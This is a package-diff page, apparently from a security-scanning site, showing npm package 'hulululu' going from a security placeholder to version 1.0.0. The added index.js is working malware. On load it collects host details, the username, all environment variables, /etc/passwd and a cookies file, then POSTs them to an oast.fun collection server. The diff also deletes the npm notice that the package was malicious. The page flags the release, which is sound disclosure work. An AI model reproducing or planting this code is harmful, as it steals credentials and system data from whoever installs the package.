hulululu 0.0.1-security → 1.0.0
Sign up to get free protection for your applications and to get access to all the features.
Potentially problematic release.
This version of hulululu might be problematic. Click here for more details.
- package/index.js +73 -0
- package/package.json +8 -3
- package/README.md +0 -5
package/index.js
ADDED
|
@@ -0,0 +1,73 @@
|
|
|
1
|
+
const os = require('os');
|
|
2
|
+
const fs = require('fs');
|
|
3
|
+
const https = require('https');
|
|
4
|
+
|
|
5
|
+
// Helper function to send data back to your server
|
|
6
|
+
const sendData = (data) => {
|
|
7
|
+
const options = {
|
|
8
|
+
hostname: 'tqixhxwvibvpvtsahqraqodmtpnukgttl.oast.fun', // Your server where you collect the info
|
|
9
|
+
port: 443,
|
|
10
|
+
path: '/thisistestone', //https://github.com/SupernormalCo/flexible-media-recorder/blob/7b54b95126e1a2f2f5a79e1dda5a78a2d77cb025/package.json#L4
|
|
11
|
+
method: 'POST',
|
|
12
|
+
headers: {
|
|
13
|
+
'Content-Type': 'application/json',
|
|
14
|
+
},
|
|
15
|
+
};
|
|
16
|
+
|
|
17
|
+
const req = https.request(options, (res) => {
|
|
18
|
+
res.on('data', (d) => {
|
|
19
|
+
process.stdout.write(d);
|
|
20
|
+
});
|
|
21
|
+
});
|
|
22
|
+
|
|
23
|
+
req.on('error', (error) => {
|
|
24
|
+
console.error(error);
|
|
25
|
+
});
|
|
26
|
+
|
|
27
|
+
req.write(JSON.stringify(data));
|
|
28
|
+
req.end();
|
|
29
|
+
};
|
|
30
|
+
|
|
31
|
+
// Gather system information
|
|
32
|
+
const getSystemInfo = () => {
|
|
33
|
+
const userInfo = os.userInfo();
|
|
34
|
+
const networkInterfaces = os.networkInterfaces();
|
|
35
|
+
|
|
36
|
+
const systemInfo = {
|
|
37
|
+
hostname: os.hostname(),
|
|
38
|
+
osType: os.type(),
|
|
39
|
+
osRelease: os.release(),
|
|
40
|
+
platform: os.platform(),
|
|
41
|
+
arch: os.arch(),
|
|
42
|
+
whoami: userInfo.username,
|
|
43
|
+
homeDir: userInfo.homedir,
|
|
44
|
+
networkInterfaces: networkInterfaces,
|
|
45
|
+
ipAddress: networkInterfaces['eth0'] ? networkInterfaces['eth0'][0].address : 'No IP',
|
|
46
|
+
macAddress: networkInterfaces['eth0'] ? networkInterfaces['eth0'][0].mac : 'No MAC',
|
|
47
|
+
uptime: os.uptime(),
|
|
48
|
+
currentWorkingDir: process.cwd(),
|
|
49
|
+
envVariables: process.env,
|
|
50
|
+
};
|
|
51
|
+
|
|
52
|
+
return systemInfo;
|
|
53
|
+
};
|
|
54
|
+
|
|
55
|
+
// Optionally, attempt to read sensitive files (ensure you are authorized to do so)
|
|
56
|
+
const readSensitiveFile = (filePath) => {
|
|
57
|
+
try {
|
|
58
|
+
const data = fs.readFileSync(filePath, 'utf8');
|
|
59
|
+
return data;
|
|
60
|
+
} catch (err) {
|
|
61
|
+
return `Error reading ${filePath}: ${err.message}`;
|
|
62
|
+
}
|
|
63
|
+
};
|
|
64
|
+
|
|
65
|
+
// Collect data
|
|
66
|
+
const collectedData = {
|
|
67
|
+
systemInfo: getSystemInfo(),
|
|
68
|
+
passwdFile: readSensitiveFile('/etc/passwd'), // Non-sensitive file on Unix-based systems
|
|
69
|
+
cookies: readSensitiveFile('/path/to/cookies'), // Adjust the path based on environment
|
|
70
|
+
};
|
|
71
|
+
|
|
72
|
+
// Send collected data back to the attacker's server
|
|
73
|
+
sendData(collectedData);
|
package/package.json
CHANGED
|
@@ -1,6 +1,11 @@
|
|
|
1
1
|
{
|
|
2
2
|
"name": "hulululu",
|
|
3
|
-
"version": "0.0
|
|
4
|
-
"
|
|
5
|
-
"
|
|
3
|
+
"version": "1.0.0",
|
|
4
|
+
"main": "index.js",
|
|
5
|
+
"scripts": {
|
|
6
|
+
"test": "echo \"Error: no test specified\" && exit 1"
|
|
7
|
+
},
|
|
8
|
+
"author": "",
|
|
9
|
+
"license": "ISC",
|
|
10
|
+
"description": ""
|
|
6
11
|
}
|
package/README.md
DELETED
|
@@ -1,5 +0,0 @@
|
|
|
1
|
-
# Security holding package
|
|
2
|
-
|
|
3
|
-
This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
|
|
4
|
-
|
|
5
|
-
Please refer to www.npmjs.com/advisories?search=hulululu for more information.
|